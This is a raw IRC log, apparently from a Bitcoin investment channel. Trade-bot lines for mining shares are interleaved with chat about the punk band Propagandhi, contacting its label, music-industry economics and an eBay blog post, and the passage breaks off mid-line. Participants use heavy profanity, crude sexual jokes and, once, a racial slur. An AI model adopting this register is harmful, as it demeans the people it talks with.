[ASICMINER-PT] 1 @ 2.146 BTC [-] Sep 05 19:01:27 [BTCTC] [ASICMINER-PT] 14 @ 2.145 = 30.03 BTC [-] Sep 05 19:02:03 [BTCTC] [TAT.VIRTUALMINE] 162 @ 0.0005999 = 0.0972 BTC [+] Sep 05 19:04:18 [BTCTC] [DMS.MINING] 121 @ 0.0024 = 0.2904 BTC [+] Sep 05 19:05:20 [BTCTC] [DMS.MINING] 2 @ 0.0024 = 0.0048 BTC [+] Sep 05 19:05:54 [BTCTC] [ACTIVEMINING] 10 @ 0.004616 = 0.0462 BTC [+] Sep 05 19:05:55 [BTCTC] [ACTIVEMINING] 360 @ 0.004617 = 1.6621 BTC [+] Sep 05 19:05:57 [BTCTC] [ACTIVEMINING] 900 @ 0.00462 = 4.158 BTC [+] Sep 05 19:05:58 [BTCTC] [ACTIVEMINING] 100 @ 0.004628 = 0.4628 BTC [+] Sep 05 19:05:58 [BTCTC] [ACTIVEMINING] 500 @ 0.00463 = 2.315 BTC [+] Sep 05 19:05:59 [BTCTC] [ACTIVEMINING] 25 @ 0.004684 = 0.1171 BTC [+] Sep 05 19:06:00 [BTCTC] [ACTIVEMINING] 95 @ 0.00476 = 0.4522 BTC [+] Sep 05 19:06:01 [BTCTC] [ACTIVEMINING] 80 @ 0.0048 = 0.384 BTC [+] Sep 05 19:07:07 [BTCTC] [DMS.MINING] 400 @ 0.0024 = 0.96 BTC [+] Sep 05 19:07:18 [BTCTC] [LABCOIN] 10 @ 0.00347 = 0.0347 BTC [+] Sep 05 19:07:19 [BTCTC] [LABCOIN] 5 @ 0.003471 = 0.0174 BTC [+] Sep 05 19:07:20 [BTCTC] [LABCOIN] 638 @ 0.003495 = 2.2298 BTC [+] Sep 05 19:07:22 [BTCTC] [LABCOIN] 1276 @ 0.003497 = 4.4622 BTC [+] Sep 05 19:08:02 [HAVELOCK] [AM100] 2 @ 0.02189999 = 0.0438 BTC [+] Sep 05 19:08:11 !ud Sep 05 19:10:17 on the somewhat unrelated topic of "there's nothing new in this world, except for the history you didn't know" : https://en.wikipedia.org/wiki/COINTELPRO Sep 05 19:10:47 [BTCTC] [DMS.MINING] 5 @ 0.0024 = 0.012 BTC [+] Sep 05 19:11:35 [HAVELOCK] [AM100] 23 @ 0.02159999 = 0.4968 BTC [-] Sep 05 19:12:09 [BTCTC] [ASICMINER-PT] 3 @ 2.23 = 6.69 BTC [+] Sep 05 19:12:12 [BTCTC] [ASICMINER-PT] 1 @ 2.245 BTC [+] Sep 05 19:12:15 this is the first I've heard someone mention cointelpro other than Propagandhi Sep 05 19:13:27 we're even, this is the first time i hear of this propagandhi Sep 05 19:13:42 a rock band of all things Sep 05 19:13:45 canadian political punk band Sep 05 19:13:56 [BTCTC] [ASICMINER-PT] 1 @ 2.278 BTC [+] Sep 05 19:13:59 [HAVELOCK] [AM1] 3 @ 2.25 = 6.75 BTC [+] Sep 05 19:14:01 very influential in a musical sense in the 90s Sep 05 19:14:30 some really awesome stuff if you like hardcore at all Sep 05 19:15:28 http://open.spotify.com/track/5lViwHuzzoc8wbW3UHQzXB Sep 05 19:15:31 Mate Ka Moris Ukun Rasik An by Propagandhi on Spotify Sep 05 19:15:42 [BTCTC] [DMS.MINING] 27 @ 0.0024 = 0.0648 BTC [+] Sep 05 19:16:35 http://open.spotify.com/track/63356fKoxdMmSk2K0J5q9F Sep 05 19:16:38 ...And We Thought That Nation-States Were A Bad Idea by Propagandhi on Spotify Sep 05 19:16:59 you'll at least like their song titles Sep 05 19:17:22 I wa a Pre-Teen McCarthyist Sep 05 19:17:39 The Only Good Fascist is a Very Dead Fascist Sep 05 19:17:49 not bad lol Sep 05 19:17:59 except, why do rthey have to be lefties ;/ Sep 05 19:18:12 [BTCTC] [DMS.MINING] 100 @ 0.0024 = 0.24 BTC [+] Sep 05 19:19:06 and of course Today's Empires, Tomorrow's Ashes Sep 05 19:19:11 How To Clean Everything. Sep 05 19:19:19 [BTCTC] [ACTIVEMINING] 251 @ 0.004622 = 1.1601 BTC [-] Sep 05 19:19:20 [BTCTC] [ACTIVEMINING] 10 @ 0.004621 = 0.0462 BTC [-] Sep 05 19:19:22 [BTCTC] [ACTIVEMINING] 439 @ 0.004619 = 2.0277 BTC [-] Sep 05 19:19:29 what that pussybacon said! Sep 05 19:19:38 Fuck Machine Sep 05 19:19:41 hehe Sep 05 19:19:42 [BTCTC] [ACTIVEMINING] 10 @ 0.004748 = 0.0475 BTC [+] Sep 05 19:20:05 Mark your points of failing. Sep 05 19:20:17 .... oh now i'VE DONE IT. gotta go listen. Sep 05 19:20:53 [BTCTC] [ACTIVEMINING] 90 @ 0.004806 = 0.4325 BTC [+] Sep 05 19:21:10 [BTCTC] [LABCOIN] 56 @ 0.003511 = 0.1966 BTC [+] Sep 05 19:21:35 they use a lot of Chomsky quotes too Sep 05 19:22:02 [BTCTC] [DMS.MINING] 345 @ 0.0024 = 0.828 BTC [+] Sep 05 19:22:02 [BTCTC] [DMS.MINING] 1000 @ 0.002411 = 2.411 BTC [+] Sep 05 19:22:04 [MPEX] [S.MPOE] 2500 @ 0.00089429 = 2.2357 BTC [+] Sep 05 19:22:22 oh yeah, the song i shoulda mentioned first With Friends Like These Who the Hell Needs COINTELPRO Sep 05 19:22:38 Who the Fuck* Sep 05 19:22:53 [BTCTC] [DMS.PURCHASE] 10 @ 0.01215 = 0.1215 BTC [-] Sep 05 19:22:55 all their songs are aptly named. Sep 05 19:23:04 he says Thick As Thieves in that song too Sep 05 19:23:11 coincidentally Sep 05 19:23:14 hey, i see they're still active actually. i wonder how much a mpex song would cost me. Sep 05 19:23:21 any of you know their agent or w/e ? Sep 05 19:23:23 [BTCTC] [DMS.PURCHASE] 100 @ 0.01215 = 1.215 BTC [-] Sep 05 19:23:35 they run their own label now i think Sep 05 19:23:41 or a former member does Sep 05 19:23:50 The G7 Welcoming Commitee Sep 05 19:24:22 CommiTtee Sep 05 19:24:33 http://www.g7welcomingcommittee.com/ Sep 05 19:24:35 [BTCTC] [DMS.SELLING] 2 @ 0.0105 = 0.021 BTC [-] Sep 05 19:24:36 G7 Welcoming Committee Records. Uncooperative since 1997. Sep 05 19:24:38 [BTCTC] [ACTIVEMINING] 1 @ 0.004806 BTC [+] Sep 05 19:24:52 duuuuuuuuuude Sep 05 19:24:53 [BTCTC] [DMS.MINING] 22 @ 0.00231 = 0.0508 BTC [-] Sep 05 19:24:56 .d Sep 05 19:24:56 86933017.77119 | Next Diff in 1776 blocks | Estimated Change: 11.3569% in 10d 22h 9m 38s Sep 05 19:25:08 ;;nethash Sep 05 19:25:08 713540.205679 Sep 05 19:25:09 ASICS are going to be operating at a loss soon Sep 05 19:25:14 if not already Sep 05 19:25:16 [BTCTC] [DMS.MINING] 78 @ 0.0023 = 0.1794 BTC [-] Sep 05 19:25:59 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0006746 BTC [+] Sep 05 19:26:10 ThickAsThieves well ya vbut i don't believe in just shotting people mail. Sep 05 19:26:17 was curious if anyone knows them. Sep 05 19:26:34 they arent all that social if recall Sep 05 19:26:49 pun unintended Sep 05 19:27:14 im sure. Sep 05 19:27:43 this is going to be the motherfucking economy of tomorrow : handling the import and expoert of trust. Sep 05 19:28:32 romanian dood wants canadian band to make a single on the grandeur of the independent state of Bitcoin, someone somewhere needs to be able to verify his credentials and contact them. Sep 05 19:28:39 traditional culture utterly fails at this, i can' Sep 05 19:28:59 t be bothered to send the girls on a six-woman forty week mission of finding me a link. Sep 05 19:29:03 nor is it worth all the airfare. Sep 05 19:29:13 lol Sep 05 19:29:17 dont you think theyd say fuck you if offered to be paid to write a song? Sep 05 19:29:26 that's not exactly what it is, obviously. Sep 05 19:29:51 i probably could dig up info by asking my old band, but we kinda dont get along... Sep 05 19:29:53 so make your own record label mircea_popescu Sep 05 19:30:07 that seems the obvious solution Sep 05 19:30:12 [BTCTC] [DMS.SELLING] 50 @ 0.0101 = 0.505 BTC [-] Sep 05 19:30:27 thestringpuller the idea of an economy is that active and productive members of society don't need to make themselves a facrtory for everything Sep 05 19:30:55 like a bitcoin video game company? Sep 05 19:30:58 :D Sep 05 19:31:21 Phone: (204) 947-2002 G7 Welcoming Committee. Sep 05 19:31:24 it's worth a shot. Sep 05 19:31:52 [BTCTC] [DMS.SELLING] 12 @ 0.0101 = 0.1212 BTC [-] Sep 05 19:31:55 info@propagandhi.com Sep 05 19:31:57 they are not mega huge as a label, you'll likely get a mail order guy on the phone Sep 05 19:32:05 worth 60 seconds each maybe? Sep 05 19:32:24 email should go direct. Sep 05 19:32:29 don't touch my labia coin Sep 05 19:32:35 nah i doubt the band checks the email Sep 05 19:32:40 [BTCTC] [DMS.PURCHASE] 6 @ 0.01215 = 0.0729 BTC [-] Sep 05 19:32:40 godo point Sep 05 19:32:54 they get flooded with demos and garage band requests Sep 05 19:33:06 they might skim them. Sep 05 19:33:16 i never heard of a band that read email. Sep 05 19:33:33 they're political, they probably receive them. Sep 05 19:33:35 they also happen to not tour very much, otherwise i'd recommend seekign out their manager Sep 05 19:33:41 i mean... not even 3 girl outfits doing playback pop dancy shit nobody books for singing Sep 05 19:33:54 [BTCTC] [DMS.SELLING] 38 @ 0.0101 = 0.3838 BTC [-] Sep 05 19:33:55 [BTCTC] [DMS.SELLING] 10 @ 0.0101 = 0.101 BTC [-] Sep 05 19:34:04 i bet if you went to their town you could look em up and have a beer Sep 05 19:34:13 bring a jacket Sep 05 19:34:15 ThickAsThieves hence the airfare comment. Sep 05 19:34:34 the best approximation to a functioning economy is me to hunt for people i know in bitcoin that live close and insist they help me. Sep 05 19:34:34 you're rich what is 50 grand to a muthafucka like you could you please remind me? Sep 05 19:34:48 which is stupid bs, but still 100% better than what it was in 2003. Sep 05 19:35:06 thestringpuller why would i want 90% of my costs to go to an airline ? the airline is not integral ion this process. Sep 05 19:35:10 i'm all for efficiency. Sep 05 19:35:15 [BTCTC] [DMS.PURCHASE] 100 @ 0.01215 = 1.215 BTC [-] Sep 05 19:35:29 [BTCTC] [DMS.SELLING] 24 @ 0.0101 = 0.2424 BTC [-] Sep 05 19:35:50 i only pay 50 bucks to fly anywhere in the world Sep 05 19:36:07 If I can get those hook ups so should everyone else Sep 05 19:36:25 they have a facebook apparently Sep 05 19:36:26 https://www.facebook.com/Propagandhi Sep 05 19:37:08 lol, look at these dudes http://www.punknews.org/bands/propagandhi Sep 05 19:37:19 [BTCTC] [LABCOIN] 1810 @ 0.00345 = 6.2445 BTC [-] Sep 05 19:37:21 [BTCTC] [LABCOIN] 390 @ 0.003451 = 1.3459 BTC [+] Sep 05 19:37:34 [BTCTC] [DMS.SELLING] 156 @ 0.0102 = 1.5912 BTC [+] Sep 05 19:37:45 [BTCTC] [DMS.SELLING] 1000 @ 0.01029 = 10.29 BTC [+] Sep 05 19:37:51 they look like dorks lol Sep 05 19:38:00 [BTCTC] [LABCOIN] 510 @ 0.003451 = 1.76 BTC [+] Sep 05 19:38:39 Ahhh Pulp Fiction Sep 05 19:38:40 [BTCTC] [ACTIVEMINING] 2 @ 0.004635 = 0.0093 BTC [-] Sep 05 19:38:43 [BTCTC] [ACTIVEMINING] 10 @ 0.004632 = 0.0463 BTC [-] Sep 05 19:38:44 underground bands on facebook is a common sight now Sep 05 19:38:46 [BTCTC] [DMS.SELLING] 1 @ 0.0101 BTC [-] Sep 05 19:38:49 the original bass player left to start a very good emo indie band called The Weakerthans Sep 05 19:38:56 not mainstream emo Sep 05 19:38:59 the real stuff Sep 05 19:39:00 at least myspace was ugly and thus had an underground feeling Sep 05 19:39:01 hehe Sep 05 19:39:23 that band has kinda evolved into old man prairie rock though Sep 05 19:39:28 [BTCTC] [DMS.SELLING] 13 @ 0.0101 = 0.1313 BTC [-] Sep 05 19:39:30 lol Sep 05 19:39:39 [BTCTC] [DMS.MINING] 10 @ 0.002301 = 0.023 BTC [+] Sep 05 19:39:40 [BTCTC] [DMS.MINING] 8 @ 0.002212 = 0.0177 BTC [-] Sep 05 19:39:42 [BTCTC] [DMS.MINING] 62 @ 0.002211 = 0.1371 BTC [-] Sep 05 19:40:02 [BTCTC] [CB.IDIFF-O] 1 @ 0.0093 BTC [+] Sep 05 19:40:05 [BTCTC] [DMS.PURCHASE] 80 @ 0.01215 = 0.972 BTC [-] Sep 05 19:40:17 http://open.spotify.com/album/6N73CDO99HMAVrBqZQVilQ great stuff Sep 05 19:40:20 Left and Leaving by The Weakerthans on Spotify Sep 05 19:40:37 [BTCTC] [DMS.MINING] 100 @ 0.002211 = 0.2211 BTC [-] Sep 05 19:40:47 [BTCTC] [ACTIVEMINING] 2 @ 0.004631 = 0.0093 BTC [-] Sep 05 19:40:48 [BTCTC] [ACTIVEMINING] 369 @ 0.004632 = 1.7092 BTC [+] Sep 05 19:40:51 many of my favorite musicians are canadian Sep 05 19:41:00 Neil Young is another Sep 05 19:41:12 his older shit i could listen to over and over Sep 05 19:41:32 [BTCTC] [DMS.PURCHASE] 330 @ 0.01215 = 4.0095 BTC [-] Sep 05 19:42:08 Canadians are weird Sep 05 19:43:04 you guys are making me want to pursue my dream of being a rap musician Sep 05 19:43:29 [BTCTC] [ACTIVEMINING] 20000 @ 0.0035 = 70 BTC [-] Sep 05 19:43:31 [BTCTC] [DMS.MINING] 2 @ 0.002437 = 0.0049 BTC [+] Sep 05 19:43:32 i thought you wanted to make movies? Sep 05 19:43:36 i mean games? Sep 05 19:43:38 i mean ? Sep 05 19:43:43 well it's a pretty cool life. bitches, cars, gold chains Sep 05 19:43:45 i? Sep 05 19:43:50 wtf lol Sep 05 19:44:23 pankkake that calls for a chop of a chihuahua with a golden chain in a motorized cart. Sep 05 19:44:30 the biggest problem with rap, is the audience is even less likely to pay for your music if you arent on a major label Sep 05 19:44:37 Call Option 20000 ฿ 0.0035 ฿ 70 Sep 05 19:44:39 You should just go after your dreams of becoming a baseketball star instead Sep 05 19:44:43 someone is bullish Sep 05 19:44:53 [BTCTC] [LABCOIN] 5 @ 0.003403 = 0.017 BTC [-] Sep 05 19:44:53 ThickAsThieves he can make any song for 50 dollars, so it dun matter. Sep 05 19:44:53 [BTCTC] [LABCOIN] 199 @ 0.003402 = 0.677 BTC [-] Sep 05 19:44:54 [BTCTC] [LABCOIN] 1500 @ 0.0034 = 5.1 BTC [-] Sep 05 19:44:55 [BTCTC] [LABCOIN] 350 @ 0.003384 = 1.1844 BTC [-] Sep 05 19:44:56 [BTCTC] [LABCOIN] 300 @ 0.003374 = 1.0122 BTC [-] Sep 05 19:44:57 [BTCTC] [LABCOIN] 145 @ 0.003371 = 0.4888 BTC [-] Sep 05 19:45:02 also part of the problem Sep 05 19:45:09 [HAVELOCK] [AM1] 1 @ 2.25 BTC [+] Sep 05 19:45:12 [BTCTC] [DMS.MINING] 18 @ 0.002213 = 0.0398 BTC [-] Sep 05 19:45:13 [BTCTC] [DMS.MINING] 10 @ 0.002212 = 0.0221 BTC [-] Sep 05 19:45:13 there is a glut of future rap stars Sep 05 19:45:15 [BTCTC] [DMS.MINING] 38 @ 0.002211 = 0.084 BTC [-] Sep 05 19:45:16 [BTCTC] [DMS.MINING] 84 @ 0.00221 = 0.1856 BTC [-] Sep 05 19:45:30 and a shortage of bitches and chains. i know, my basement is overflowing. Sep 05 19:45:36 lol Sep 05 19:45:54 it's hard to show your bitcoins in clips too Sep 05 19:46:09 pankkake not hard at all, convert to buttcoins, show those Sep 05 19:46:25 (reference : http://trilema.com/2013/they-really-are-buttcoins-nao/) Sep 05 19:47:00 10 BTC? that's well paid Sep 05 19:47:21 it pays to be an asshole, on both ends Sep 05 19:47:23 bam! Sep 05 19:47:32 [HAVELOCK] [XBOND] 600 @ 0.00111997 = 0.672 BTC [-] Sep 05 19:47:50 [BTCTC] [LABCOIN] 3 @ 0.003447 = 0.0103 BTC [+] Sep 05 19:48:02 [HAVELOCK] [XBOND] 2 @ 0.00111997 = 0.0022 BTC [-] Sep 05 19:48:06 [HAVELOCK] [LABCO] 3 @ 0.00349 = 0.0105 BTC [-] Sep 05 19:49:13 pankkake some people claim to be rich. some people are rich. Sep 05 19:49:18 the difference is always in what they do. Sep 05 19:49:23 the picture is horribly bad though. I wouldn't have paid Sep 05 19:49:50 [BTCTC] [LABCOIN] 10 @ 0.003447 = 0.0345 BTC [+] Sep 05 19:49:55 which reminds me, hasn't bfl been doing all this noise about how they will eventually donate BTC ? Sep 05 19:50:07 you could fake being rich easily Sep 05 19:50:15 over the course of the past year they keep talking about this donation that never materialised, somehow. Sep 05 19:50:36 yeah remember they gave it to themselves to give to luke and the EFF Sep 05 19:50:43 heh Sep 05 19:51:10 i wonder how many people can match mpex csr, and im amused "the community" has no fucking clue. Sep 05 19:51:19 csr? Sep 05 19:51:54 [BTCTC] [LABCOIN] 10 @ 0.003447 = 0.0345 BTC [+] Sep 05 19:52:05 [MPEX] [S.MPOE] 3350 @ 0.00089383 = 2.9943 BTC [-] Sep 05 19:52:09 customer service rep? Sep 05 19:52:28 corp social responsibility Sep 05 19:52:49 http://lmgtfy.com/?q=csr Sep 05 19:52:53 Let me google that for you Sep 05 19:53:17 do you report it? Sep 05 19:53:22 yeah. Sep 05 19:53:33 link? Sep 05 19:53:33 certificate signing request ;) Sep 05 19:53:53 [BTCTC] [LABCOIN] 3 @ 0.003447 = 0.0103 BTC [+] Sep 05 19:53:53 im too lazy, and i prefer bitching anyway. but there was a link right up there. Sep 05 19:54:09 ThickAsThieves: rappers make their money from shows Sep 05 19:54:24 and from niggaz playin shit in da club Sep 05 19:54:37 that's why being an up and coming rapper is a shitty lifestyle Sep 05 19:55:06 all musicianship is a shitty lifestyle Sep 05 19:55:21 all catering to "the public" is a shitty lifestyle. Sep 05 19:55:49 I went to school with these guys: http://www.usroyaltymusic.com/ They're living very well... Sep 05 19:56:23 I like the model of only selling a few records, but selling high quality expensive ones Sep 05 19:56:39 that's not how musicians make money Sep 05 19:56:43 which you can somewhat supplement with very cheap digital distribution Sep 05 19:56:44 pankkake lol someone doing that ? Sep 05 19:56:54 musicians dont make money Sep 05 19:57:00 yea they do Sep 05 19:57:05 you either teach Sep 05 19:57:07 well I guess it pays for the studio Sep 05 19:57:11 but not much else Sep 05 19:57:17 or you play shows Sep 05 19:57:21 or both Sep 05 19:57:27 even studios are having their lunch eaten by fledgling producers Sep 05 19:57:42 [BTCTC] [DMS.SELLING] 6 @ 0.0101 = 0.0606 BTC [-] Sep 05 19:58:05 of the five doods running studios in the 90s i knew, 0 still run a studio. Sep 05 19:58:12 eh, even shows, from what I've heard, it pays… the tour Sep 05 19:58:16 too many studios mang Sep 05 19:58:38 it's better for a label to just own a studio instead of forking out money for studio time Sep 05 19:58:48 basically the only money being paid for music is scooped up by the powers that be Sep 05 19:59:00 ThickAsThieves: maybe Sep 05 19:59:07 but shows are where it's at going on tour and shit Sep 05 19:59:12 ^ Sep 05 19:59:16 Merch. Sep 05 19:59:19 you have to resolve to making it on your own Sep 05 19:59:23 ThickAsThieves exactly. Sep 05 19:59:26 going viral etc Sep 05 19:59:29 not always Sep 05 19:59:35 you can be "discovered" Sep 05 19:59:35 then when you do Sep 05 19:59:44 the label buys your business from you Sep 05 19:59:59 you're at a party with Jay-Z and you compliment his baby through song, and he decides to pick you up as an artist Sep 05 19:59:59 you do the dirty work, they take the money Sep 05 20:00:00 thestringpuller being "discovered" is strictly a license to suck some dudes cock for free if you're so inclined. Sep 05 20:00:01 i'd know. Sep 05 20:00:08 i know Sep 05 20:00:16 I was just saying that's another option of success for a musician Sep 05 20:00:18 being a whore Sep 05 20:00:20 :P Sep 05 20:00:36 Don't discredit whore-dom, it's a good line of work. The whores work hard for their money too. Sep 05 20:01:08 being discovered is having a marketable identity and accepting to autotune everything Sep 05 20:01:09 can we put that on your grave? "Was a Hard-Working Whore" Sep 05 20:01:12 im not discrediting whoredom. Sep 05 20:01:21 isn't the real work done by the pimps? Sep 05 20:01:26 i'm discrediting the false beliefthat you can make it as a whore through the oblique way of "singing" Sep 05 20:01:43 it dun work. you want to make it as a whore the first thing is dropping your idiotic preconceived notions Sep 05 20:01:53 it's why i like whores rather than, say, social sciences student chicks. Sep 05 20:02:08 i get that, I was just bringing it up as a pathway Sep 05 20:02:17 no no ! arguments ! SCANDAL! Sep 05 20:02:34 [MPEX] [S.MPOE] 8600 @ 0.00089429 = 7.6909 BTC [+] Sep 05 20:02:40 if you don't mind sucking the giant industry penis have fun I suppose? Sep 05 20:02:48 at least you won't starve Sep 05 20:03:33 That's the exact reason Chappelle quit Hollywood. He didn't want to be a whore anymore. Sep 05 20:04:27 some whores become pimps i guess Sep 05 20:04:50 http://www.youtube.com/watch?v=iHpsiSSNapQ Sep 05 20:04:51 Dave Chappelle-What's Wrong With Hollywood - YouTube Sep 05 20:05:07 that's from inside actors studio no? @ kleeck Sep 05 20:05:17 Yeah, so good! Sep 05 20:06:08 [BTCTC] [DMS.SELLING] 10 @ 0.0096 = 0.096 BTC [-] Sep 05 20:06:19 [BTCTC] [DMS.SELLING] 6 @ 0.0096 = 0.0576 BTC [-] Sep 05 20:06:21 [BTCTC] [DMS.SELLING] 194 @ 0.0092 = 1.7848 BTC [-] Sep 05 20:08:15 dmc august report out: https://bitcointalk.org/index.php?topic=77469.msg3089234#msg3089234 Sep 05 20:08:19 [BTCTC] [ACTIVEMINING] 100 @ 0.00463 = 0.463 BTC [+] Sep 05 20:08:21 [BTCTC] [ACTIVEMINING] 9 @ 0.004621 = 0.0416 BTC [-] Sep 05 20:08:22 [BTCTC] [ACTIVEMINING] 561 @ 0.004619 = 2.5913 BTC [-] Sep 05 20:08:23 [BTCTC] [ACTIVEMINING] 10 @ 0.004616 = 0.0462 BTC [-] Sep 05 20:08:37 [BTCTC] [ASICMINER-PT] 1 @ 2.272 BTC [-] Sep 05 20:08:48 DiabloD3!*@* added to ignore list. Sep 05 20:08:56 Ive had a few friends meet Chapelle around Columbus Oh area. He is just a regular dude. He gets pissed when people just come up and sneak a photo. Sep 05 20:09:05 He'd much rather sit and have a beer with you. Sep 05 20:09:19 yea, my cousins live on a farm near him Sep 05 20:09:22 http://deals.ebay.com/blog/whats-the-deal-with-bitcoins-anyway/ Sep 05 20:09:24 What's the Deal with Bitcoins Anyway? | Daily Deals BlogDaily Deals Blog Sep 05 20:09:41 he's a pretty cool dude, doesn't bother none Sep 05 20:09:44 grows good ass weed Sep 05 20:09:45 SEEMS like TRAP Sep 05 20:10:18 possibly the best retarded article on bitcoin Sep 05 20:10:27 "what do you think, is this article the real deal or not really?" Sep 05 20:13:09 weird Sep 05 20:13:21 so ebay wants to poll people on bitcoin? Sep 05 20:13:43 not sure if price discovery is harder because n00bs are speculating Sep 05 20:15:39 [BTCTC] [BASIC-MINING] 1 @ 0.1379 BTC [+] Sep 05 20:15:39 [BTCTC] [BASIC-MINING] 1 @ 0.1379 BTC [+] Sep 05 20:15:51 some policy maker at ebay called bitcoin sellers of ebay and talked about their experience -> https://bitcointalk.org/index.php?topic=178336.msg3087089#msg3087089 Sep 05 20:16:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.02104 BTC [-] Sep 05 20:16:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.02103 = 0.2103 BTC [-] Sep 05 20:16:15 [BTCTC] [TAT.ASICMINER] 4 @ 0.021 = 0.084 BTC [-] Sep 05 20:16:45 ebay worker: "Responsible for developing and implementing policies to effectively manage regulatory, industry and brand risks.", "Interface with third parties, including government officials, law enforcement, trade groups and individual companies." Sep 05 20:16:51 [BTCTC] [TAT.ASICMINER] 27 @ 0.0216 = 0.5832 BTC [+] Sep 05 20:31:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.02129 BTC [-] Sep 05 20:31:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0213 BTC [+] Sep 05 20:31:40 [BTCTC] [ASICMINER-PT] 2 @ 2.23 = 4.46 BTC [-] Sep 05 20:32:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.02155 = 0.2155 BTC [+] Sep 05 20:34:35 [BTCTC] [TAT.ASICMINER] 9 @ 0.02102 = 0.1892 BTC [-] Sep 05 20:34:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.02102 = 0.2102 BTC [-] Sep 05 20:34:38 [BTCTC] [TAT.ASICMINER] 28 @ 0.021 = 0.588 BTC [-] Sep 05 20:35:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.021 BTC [-] Sep 05 20:37:28 [BTCTC] [BASIC-MINING] 2 @ 0.1301 = 0.2602 BTC [-] Sep 05 20:37:43 [BTCTC] [ACTIVEMINING] 10 @ 0.004696 = 0.047 BTC [+] Sep 05 20:37:59 [BTCTC] [ACTIVEMINING] 139 @ 0.004696 = 0.6527 BTC [+] Sep 05 20:39:56 [HAVELOCK] [SDSTM] 1 @ 0.00332 BTC [-] Sep 05 20:40:06 [HAVELOCK] [SDSTM] 2 @ 0.00263 = 0.0053 BTC [-] Sep 05 20:41:08 [HAVELOCK] [AM100] 2 @ 0.0218 = 0.0436 BTC [+] Sep 05 20:42:43 [HAVELOCK] [SMG] 20 @ 0.00022 = 0.0044 BTC [-] Sep 05 20:43:19 [BTCTC] [LABCOIN] 3 @ 0.003435 = 0.0103 BTC [-] Sep 05 20:43:20 [BTCTC] [LABCOIN] 5 @ 0.003436 = 0.0172 BTC [+] Sep 05 20:43:43 [BTCTC] [DMS.MINING] 1 @ 0.002397 BTC [+] Sep 05 20:44:39 [BTCTC] [BFMINES] 1 @ 0.0035 BTC [+] Sep 05 20:44:41 [BTCTC] [BFMINES] 66 @ 0.003501 = 0.2311 BTC [+] Sep 05 20:44:42 [BTCTC] [BFMINES] 39 @ 0.003757 = 0.1465 BTC [+] Sep 05 20:45:37 [BTCTC] [LABCOIN] 900 @ 0.003436 = 3.0924 BTC [+] Sep 05 20:45:39 [HAVELOCK] [SDSTM] 1 @ 0.00263 BTC [-] Sep 05 20:48:58 Have you guys seen this? http://deals.ebay.com/blog/whats-the-deal-with-bitcoins-anyway/ Sep 05 20:50:25 It was linked here about 40 mins ago. Sep 05 20:50:59 Apparently, it's not posted by ebay anyways. Sep 05 20:51:25 it's not. Sep 05 20:51:41 I just said that. Sep 05 20:51:47 :D Sep 05 20:52:19 I suppose taht's where the "Blog" becomes important to note. Sep 05 20:58:13 [BTCTC] [LABCOIN] 5 @ 0.003437 = 0.0172 BTC [+] Sep 05 20:58:14 [BTCTC] [LABCOIN] 2002 @ 0.003436 = 6.8789 BTC [-] Sep 05 20:58:16 [BTCTC] [LABCOIN] 176 @ 0.003402 = 0.5988 BTC [-] Sep 05 20:58:16 [BTCTC] [LABCOIN] 1500 @ 0.0034 = 5.1 BTC [-] Sep 05 20:58:17 [BTCTC] [LABCOIN] 19 @ 0.0034 = 0.0646 BTC [-] Sep 05 20:58:18 [BTCTC] [LABCOIN] 150 @ 0.003372 = 0.5058 BTC [-] Sep 05 20:58:19 [BTCTC] [LABCOIN] 452 @ 0.003371 = 1.5237 BTC [-] Sep 05 20:58:20 [BTCTC] [LABCOIN] 150 @ 0.003369 = 0.5054 BTC [-] Sep 05 20:58:21 [BTCTC] [LABCOIN] 1900 @ 0.003363 = 6.3897 BTC [-] Sep 05 20:58:22 [BTCTC] [LABCOIN] 1900 @ 0.003362 = 6.3878 BTC [-] Sep 05 20:58:23 [BTCTC] [LABCOIN] 250 @ 0.003361 = 0.8403 BTC [-] Sep 05 20:58:24 [BTCTC] [LABCOIN] 2250 @ 0.003361 = 7.5623 BTC [-] Sep 05 20:58:25 [BTCTC] [LABCOIN] 3200 @ 0.00336 = 10.752 BTC [-] Sep 05 20:58:27 [BTCTC] [LABCOIN] 500 @ 0.003357 = 1.6785 BTC [-] Sep 05 20:58:27 [BTCTC] [LABCOIN] 2000 @ 0.003356 = 6.712 BTC [-] Sep 05 20:58:28 [BTCTC] [LABCOIN] 50 @ 0.003353 = 0.1677 BTC [-] Sep 05 20:58:29 [BTCTC] [LABCOIN] 100 @ 0.003352 = 0.3352 BTC [-] Sep 05 20:58:30 [BTCTC] [LABCOIN] 65 @ 0.00335 = 0.2178 BTC [-] Sep 05 20:58:31 [BTCTC] [LABCOIN] 35 @ 0.00335 = 0.1173 BTC [-] Sep 05 20:58:32 [BTCTC] [LABCOIN] 550 @ 0.003341 = 1.8376 BTC [-] Sep 05 20:58:33 [BTCTC] [LABCOIN] 1000 @ 0.00334 = 3.34 BTC [-] Sep 05 20:58:34 [BTCTC] [LABCOIN] 1200 @ 0.00334 = 4.008 BTC [-] Sep 05 20:58:35 [BTCTC] [LABCOIN] 24 @ 0.003333 = 0.08 BTC [-] Sep 05 20:58:36 [BTCTC] [LABCOIN] 96 @ 0.003332 = 0.3199 BTC [-] Sep 05 20:58:37 [BTCTC] [LABCOIN] 197 @ 0.003318 = 0.6536 BTC [-] Sep 05 20:58:38 [BTCTC] [LABCOIN] 790 @ 0.003317 = 2.6204 BTC [-] Sep 05 20:58:38 [BTCTC] [LABCOIN] 100 @ 0.003316 = 0.3316 BTC [-] Sep 05 20:58:39 [BTCTC] [LABCOIN] 200 @ 0.003315 = 0.663 BTC [-] Sep 05 20:58:40 [BTCTC] [LABCOIN] 200 @ 0.003313 = 0.6626 BTC [-] Sep 05 20:58:41 [BTCTC] [LABCOIN] 50 @ 0.003311 = 0.1656 BTC [-] Sep 05 20:58:42 [BTCTC] [LABCOIN] 200 @ 0.00331 = 0.662 BTC [-] Sep 05 20:58:43 [BTCTC] [LABCOIN] 200 @ 0.003307 = 0.6614 BTC [-] Sep 05 20:58:44 [BTCTC] [LABCOIN] 562 @ 0.003307 = 1.8585 BTC [-] Sep 05 20:58:45 [BTCTC] [LABCOIN] 98 @ 0.003306 = 0.324 BTC [-] Sep 05 20:58:46 [BTCTC] [LABCOIN] 1850 @ 0.003305 = 